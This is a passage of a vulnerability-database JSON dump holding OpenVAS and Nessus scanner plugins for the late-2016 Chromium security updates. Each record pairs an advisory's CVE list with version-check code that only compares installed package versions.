chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-5181\nA cross-site scripting issue was discovered.\n\nCVE-2016-5182\nGiwan Go discovered a heap overflow issue.\n\nCVE-2016-5183\nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184\nAnother use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185\ncloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186\nAbdulrahman Alqabandi discovered an out-of-bounds read issue in the\ndeveloper tools.\n\nCVE-2016-5187\nLuan Herrera discovered a URL spoofing issue.\n\nDescription truncated. Please see the references for more information.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed\nsoftware version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:13", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-5181 \nA cross-site scripting issue was discovered.\n\nCVE-2016-5182 \nGiwan Go discovered a heap overflow issue.\n\nCVE-2016-5183 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184 \nAnother use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185 \ncloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186 \nAbdulrahman Alqabandi discovered an out-of-bounds read issue in the\ndeveloper tools.\n\nCVE-2016-5187 \nLuan Herrera discovered a URL spoofing issue.\n\nCVE-2016-5188 \nLuan Herrera discovered that some drop down menus can be used to\nhide parts of the user interface.\n\nCVE-2016-5189 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-5190 \nAtte Kettunen discovered a use-after-free issue.\n\nCVE-2016-5191 \nGareth Hughes discovered a cross-site scripting issue.\n\nCVE-2016-5192 \nhaojunhou@gmail.com discovered a same-origin bypass.\n\nCVE-2016-5193 \nYuyang Zhou discovered a way to pop open a new window.\n\nCVE-2016-5194 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-5198 \nTencent Keen Security Lab discovered an out-of-bounds memory access\nissue in the v8 javascript library.\n\nCVE-2016-5199 \nA heap corruption issue was discovered in the ffmpeg library.\n\nCVE-2016-5200 \nChoongwoo Han discovered an out-of-bounds memory access issue in\nthe v8 javascript library.\n\nCVE-2016-5201 \nRob Wu discovered an information leak.\n\nCVE-2016-5202 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-5203 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5204 \nMariusz Mlynski discovered a cross-site scripting issue in SVG\nimage handling.\n\nCVE-2016-5205 \nA cross-site scripting issue was discovered.\n\nCVE-2016-5206 \nRob Wu discovered a same-origin bypass in the pdfium library.\n\nCVE-2016-5207 \nMariusz Mlynski discovered a cross-site scripting issue.\n\nCVE-2016-5208 \nMariusz Mlynski discovered another cross-site scripting issue.\n\nCVE-2016-5209 \nGiwan Go discovered an out-of-bounds write issue in Blink/Webkit.\n\nCVE-2016-5210 \nKe Liu discovered an out-of-bounds write in the pdfium library.\n\nCVE-2016-5211 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5212 \nKhalil Zhani discovered an information disclosure issue in the\ndeveloper tools.\n\nCVE-2016-5213 \nKhalil Zhani discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2016-5214 \nJonathan Birch discovered a file download protection bypass.\n\nCVE-2016-5215 \nLooben Yang discovered a use-after-free issue.\n\nCVE-2016-5216 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5217 \nRob Wu discovered a condition where data was not validated by\nthe pdfium library.\n\nCVE-2016-5218 \nAbdulrahman Alqabandi discovered a URL spoofing issue.\n\nCVE-2016-5219 \nRob Wu discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2016-5220 \nRob Wu discovered a way to access files on the local system.\n\nCVE-2016-5221 \nTim Becker discovered an integer overflow issue in the angle\nlibrary.\n\nCVE-2016-5222 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-5223 \nHwiwon Lee discovered an integer overflow issue in the pdfium\nlibrary.\n\nCVE-2016-5224 \nRoeland Krak discovered a same-origin bypass in SVG image handling.\n\nCVE-2016-5225 \nScott Helme discovered a Content Security Protection bypass.\n\nCVE-2016-5226 \nJun Kokatsu discovered a cross-scripting issue.\n\nCVE-2016-9650 \nJakub ?oczek discovered a Content Security Protection information\ndisclosure.\n\nCVE-2016-9651 \nGuang Gong discovered a way to access private data in the v8\njavascript library.\n\nCVE-2016-9652 \nThe chrome development team found and fixed various issues during\ninternal auditing.", "modified": "2017-07-07T00:00:00", "published": "2016-12-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703731", "id": "OPENVAS:703731", "title": "Debian Security Advisory DSA 3731-1 (chromium-browser - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3731.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3731-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703731);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\",\n \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\",\n \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\",\n \"CVE-2016-5193\", \"CVE-2016-5194\", \"CVE-2016-5198\", \"CVE-2016-5199\",\n \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\", \"CVE-2016-5203\",\n \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\",\n \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\",\n \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\",\n \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\",\n \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\",\n \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\",\n \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_name(\"Debian Security Advisory DSA 3731-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-11 00:00:00 +0100 (Sun, 11 Dec 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3731.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 55.0.2883.75-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 55.0.2883.75-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-5181 \nA cross-site scripting issue was discovered.\n\nCVE-2016-5182 \nGiwan Go discovered a heap overflow issue.\n\nCVE-2016-5183 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184 \nAnother use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185 \ncloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186 \nAbdulrahman Alqabandi discovered an out-of-bounds read issue in the\ndeveloper tools.\n\nCVE-2016-5187 \nLuan Herrera discovered a URL spoofing issue.\n\nCVE-2016-5188 \nLuan Herrera discovered that some drop down menus can be used to\nhide parts of the user interface.\n\nCVE-2016-5189 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-5190 \nAtte Kettunen discovered a use-after-free issue.\n\nCVE-2016-5191 \nGareth Hughes discovered a cross-site scripting issue.\n\nCVE-2016-5192 \nhaojunhou@gmail.com discovered a same-origin bypass.\n\nCVE-2016-5193 \nYuyang Zhou discovered a way to pop open a new window.\n\nCVE-2016-5194 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-5198 \nTencent Keen Security Lab discovered an out-of-bounds memory access\nissue in the v8 javascript library.\n\nCVE-2016-5199 \nA heap corruption issue was discovered in the ffmpeg library.\n\nCVE-2016-5200 \nChoongwoo Han discovered an out-of-bounds memory access issue in\nthe v8 javascript library.\n\nCVE-2016-5201 \nRob Wu discovered an information leak.\n\nCVE-2016-5202 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-5203 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5204 \nMariusz Mlynski discovered a cross-site scripting issue in SVG\nimage handling.\n\nCVE-2016-5205 \nA cross-site scripting issue was discovered.\n\nCVE-2016-5206 \nRob Wu discovered a same-origin bypass in the pdfium library.\n\nCVE-2016-5207 \nMariusz Mlynski discovered a cross-site scripting issue.\n\nCVE-2016-5208 \nMariusz Mlynski discovered another cross-site scripting issue.\n\nCVE-2016-5209 \nGiwan Go discovered an out-of-bounds write issue in Blink/Webkit.\n\nCVE-2016-5210 \nKe Liu discovered an out-of-bounds write in the pdfium library.\n\nCVE-2016-5211 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5212 \nKhalil Zhani discovered an information disclosure issue in the\ndeveloper tools.\n\nCVE-2016-5213 \nKhalil Zhani discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2016-5214 \nJonathan Birch discovered a file download protection bypass.\n\nCVE-2016-5215 \nLooben Yang discovered a use-after-free issue.\n\nCVE-2016-5216 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5217 \nRob Wu discovered a condition where data was not validated by\nthe pdfium library.\n\nCVE-2016-5218 \nAbdulrahman Alqabandi discovered a URL spoofing issue.\n\nCVE-2016-5219 \nRob Wu discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2016-5220 \nRob Wu discovered a way to access files on the local system.\n\nCVE-2016-5221 \nTim Becker discovered an integer overflow issue in the angle\nlibrary.\n\nCVE-2016-5222 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-5223 \nHwiwon Lee discovered an integer overflow issue in the pdfium\nlibrary.\n\nCVE-2016-5224 \nRoeland Krak discovered a same-origin bypass in SVG image handling.\n\nCVE-2016-5225 \nScott Helme discovered a Content Security Protection bypass.\n\nCVE-2016-5226 \nJun Kokatsu discovered a cross-scripting issue.\n\nCVE-2016-9650 \nJakub ?oczek discovered a Content Security Protection information\ndisclosure.\n\nCVE-2016-9651 \nGuang Gong discovered a way to access private data in the v8\njavascript library.\n\nCVE-2016-9652 \nThe chrome development team found and fixed various issues during\ninternal auditing.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-23T11:13:09", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 55.0.2883.75. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists in PDFium in the\n Document::removeField() function within file\n fpdfsdk/javascript/Document.cpp when removing fields\n within a document. An unauthenticated, remote attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-5203)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of the ", "modified": "2019-11-02T00:00:00", "id": "GOOGLE_CHROME_55_0_2883_75.NASL", "href": "https://www.tenable.com/plugins/nessus/95480", "published": "2016-12-02T00:00:00", "title": "Google Chrome < 55.0.2883.75 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95480);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2016-5203\",\n \"CVE-2016-5204\",\n \"CVE-2016-5205\",\n \"CVE-2016-5206\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5209\",\n \"CVE-2016-5210\",\n \"CVE-2016-5211\",\n \"CVE-2016-5212\",\n \"CVE-2016-5213\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5216\",\n \"CVE-2016-5217\",\n \"CVE-2016-5218\",\n \"CVE-2016-5219\",\n \"CVE-2016-5220\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5223\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-5226\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\"\n );\n script_bugtraq_id(94633);\n\n script_name(english:\"Google Chrome < 55.0.2883.75 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 55.0.2883.75. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists in PDFium in the\n Document::removeField() function within file\n fpdfsdk/javascript/Document.cpp when removing fields\n within a document. An unauthenticated, remote attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-5203)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of the 'use'\n SVG element when calling event listeners on a cloned\n node. An unauthenticated, remote attacker can exploit\n this to execute arbitrary script code in a user's\n browser session. (CVE-2016-5204)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to permitting frame swaps during\n frame detach. An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5205)\n\n - A security bypass vulnerability exists in PDFium due to\n a flaw in the DocumentLoader::GetRequest() function\n within file pdf/document_loader.cc when handling\n redirects in the plugin. An unauthenticated, remote\n attacker can exploit this to bypass the same-origin\n policy. (CVE-2016-5206)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink, specifically in the\n V8EventListener::getListenerFunction() function within\n file bindings/core/v8/V8EventListener.cpp, due to\n allowing the 'handleEvent' getter to run on forbidden\n scripts. An unauthenticated, remote attacker can exploit\n this to execute arbitrary script code in a user's\n browser session. (CVE-2016-5207)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of triggered\n events (e.g., closing a color chooser for an input\n element). An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5208)\n\n - An out-of-bounds write error exists in Blink due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-5209)\n\n - An out-of-bounds write error exists in PDFium in the\n CWeightTable::GetPixelWeightSize() function within file\n core/fxge/dib/fx_dib_engine.cpp. An unauthenticated,\n remote attacker can exploit this to corrupt memory,\n resulting in a denial of service condition or the\n execution of arbitrary code. (CVE-2016-5210)\n\n - An unspecified use-after-free error exists in PDFium due\n to improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-5211)\n\n - A unspecified flaw exists in the DevTools component due\n to improper validation of certain URLs that allows an\n unauthenticated, remote attacker to disclose the content\n of arbitrary files. (CVE-2016-5212)\n\n - Multiple use-after-free errors exist in the inspector\n component in V8 that allow an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2016-5213,\n CVE-2016-5219)\n\n - A file download protection bypass vulnerability exists\n when downloading files that involve 'data:' URIs,\n unknown URI schemes, or overly long URLs. An\n unauthenticated, remote attacker can exploit this to\n cause a file to be downloaded without applying the\n mark-of-the-web. (CVE-2016-5214)\n\n - A use-after-free error exists in WebAudio within file\n content/renderer/media/renderer_webaudiodevice_impl.cc\n due to improper handling of web audio. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-5215)\n\n - A use-after-free error exists in PDFium, specifically\n within file pdf/pdfium/pdfium_engine.cc, due to improper\n handling of non-visible page unloading. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-5216)\n\n - A flaw exists in PDFium due to the use of unvalidated\n data by the PDF helper extension. An authenticated,\n remote attacker can exploit this to have an unspecified\n impact. No other details are available. (CVE-2016-5217)\n\n - A flaw exists when handling chrome.tabs API navigations\n and displaying the pending URL. An unauthenticated,\n remote attacker can exploit this to spoof the Omnibox\n address. (CVE-2016-5218)\n\n - An information disclosure vulnerability exists in\n PDFium, due to improper handling of 'file: navigation',\n that allows an unauthenticated, remote attacker to\n disclose local files. (CVE-2016-5220)\n\n - An integer overflow condition exists in ANGLE due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n have an unspecified impact. (CVE-2016-5221)\n\n - A flaw exists in the NavigatorImpl::NavigateToEntry()\n function within file frame_host/navigator_impl.cc due to\n improper handling of invalid URLs. An unauthenticated,\n remote attacker can exploit this to spoof the Omnibox\n address. (CVE-2016-5222)\n\n - An integer overflow condition exists in PDFium within\n file core/fpdfapi/page/cpdf_page.cpp that allows an\n authenticated, remote attacker to have an unspecified\n impact. No other details are available. (CVE-2016-5223)\n\n - A security bypass vulnerability exists in the SVG\n component due to denorm handling not being disabled\n before calling Skia filter code. An unauthenticated,\n remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-5224)\n\n - A flaw exists in Blink, specifically in the\n HTMLFormElement::scheduleFormSubmission() function\n within file html/HTMLFormElement.cpp, due to improper\n enforcement of the form-action CSP (Content Security\n Policy). An unauthenticated, remote attacker can exploit\n this to bypass intended access restrictions.\n (CVE-2016-5225)\n\n - A cross-site scripting (XSS) vulnerability exists in\n Blink within file ui/views/tabs/tab_strip.cc due to\n improper validation of input when dropping JavaScript\n URLs on a tab. An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5226)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to disclose Content\n Security Policy (CSP) referrers. (CVE-2016-9650)\n\n - An unspecified flaw exists in V8 within lookup.cc that\n allows unauthorized private property access. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-9651)\n\n - Multiple other vulnerabilities exist, the most serious\n of which can be exploited by an authenticated, remote\n attacker to execute arbitrary code. (CVE-2016-9652)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://googlechromereleases.blogspot.com/2016/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe6e9a5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 55.0.2883.75 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9652\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'55.0.2883.75', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-23T11:40:32", "bulletinFamily": "scanner", "description": "This update to Chromium 55.0.2883.75 fixes the following\nvulnerabilities :\n\n - CVE-2016-9651: Private property access in V8\n\n - CVE-2016-5208: Universal XSS in Blink\n\n - CVE-2016-5207: Universal XSS in Blink\n\n - CVE-2016-5206: Same-origin bypass in PDFium\n\n - CVE-2016-5205: Universal XSS in Blink\n\n - CVE-2016-5204: Universal XSS in Blink\n\n - CVE-2016-5209: Out of bounds write in Blink\n\n - CVE-2016-5203: Use after free in PDFium\n\n - CVE-2016-5210: Out of bounds write in PDFium\n\n - CVE-2016-5212: Local file disclosure in DevTools\n\n - CVE-2016-5211: Use after free in PDFium\n\n - CVE-2016-5213: Use after free in V8\n\n - CVE-2016-5214: File download protection bypass\n\n - CVE-2016-5216: Use after free in PDFium\n\n - CVE-2016-5215: Use after free in Webaudio\n\n - CVE-2016-5217: Use of unvalidated data in PDFium\n\n - CVE-2016-5218: Address spoofing in Omnibox\n\n - CVE-2016-5219: Use after free in V8\n\n - CVE-2016-5221: Integer overflow in ANGLE\n\n - CVE-2016-5220: Local file access in PDFium\n\n - CVE-2016-5222: Address spoofing in Omnibox\n\n - CVE-2016-9650: CSP Referrer disclosure\n\n - CVE-2016-5223: Integer overflow in PDFium\n\n - CVE-2016-5226: Limited XSS in Blink\n\n - CVE-2016-5225: CSP bypass in Blink\n\n - CVE-2016-5224: Same-origin bypass in SVG\n\n - CVE-2016-9652: Various fixes from internal audits,\n fuzzing and other initiatives\n\nThe default bookmarks override was removed.\n\nThe following packaging changes are included :\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg,\n where available.\n\n - Chromium now requires harfbuzz >= 1.3.0", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2016-1453.NASL", "href": "https://www.tenable.com/plugins/nessus/95788", "published": "2016-12-14T00:00:00", "title": "openSUSE Security Update : Chromium (openSUSE-2016-1453)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1453.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95788);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-1453)\");\n script_summary(english:\"Check for the openSUSE-2016-1453 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to Chromium 55.0.2883.75 fixes the following\nvulnerabilities :\n\n - CVE-2016-9651: Private property access in V8\n\n - CVE-2016-5208: Universal XSS in Blink\n\n - CVE-2016-5207: Universal XSS in Blink\n\n - CVE-2016-5206: Same-origin bypass in PDFium\n\n - CVE-2016-5205: Universal XSS in Blink\n\n - CVE-2016-5204: Universal XSS in Blink\n\n - CVE-2016-5209: Out of bounds write in Blink\n\n - CVE-2016-5203: Use after free in PDFium\n\n - CVE-2016-5210: Out of bounds write in PDFium\n\n - CVE-2016-5212: Local file disclosure in DevTools\n\n - CVE-2016-5211: Use after free in PDFium\n\n - CVE-2016-5213: Use after free in V8\n\n - CVE-2016-5214: File download protection bypass\n\n - CVE-2016-5216: Use after free in PDFium\n\n - CVE-2016-5215: Use after free in Webaudio\n\n - CVE-2016-5217: Use of unvalidated data in PDFium\n\n - CVE-2016-5218: Address spoofing in Omnibox\n\n - CVE-2016-5219: Use after free in V8\n\n - CVE-2016-5221: Integer overflow in ANGLE\n\n - CVE-2016-5220: Local file access in PDFium\n\n - CVE-2016-5222: Address spoofing in Omnibox\n\n - CVE-2016-9650: CSP Referrer disclosure\n\n - CVE-2016-5223: Integer overflow in PDFium\n\n - CVE-2016-5226: Limited XSS in Blink\n\n - CVE-2016-5225: CSP bypass in Blink\n\n - CVE-2016-5224: Same-origin bypass in SVG\n\n - CVE-2016-9652: Various fixes from internal audits,\n fuzzing and other initiatives\n\nThe default bookmarks override was removed.\n\nThe following packaging changes are included :\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg,\n where available.\n\n - Chromium now requires harfbuzz >= 1.3.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1013236\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n 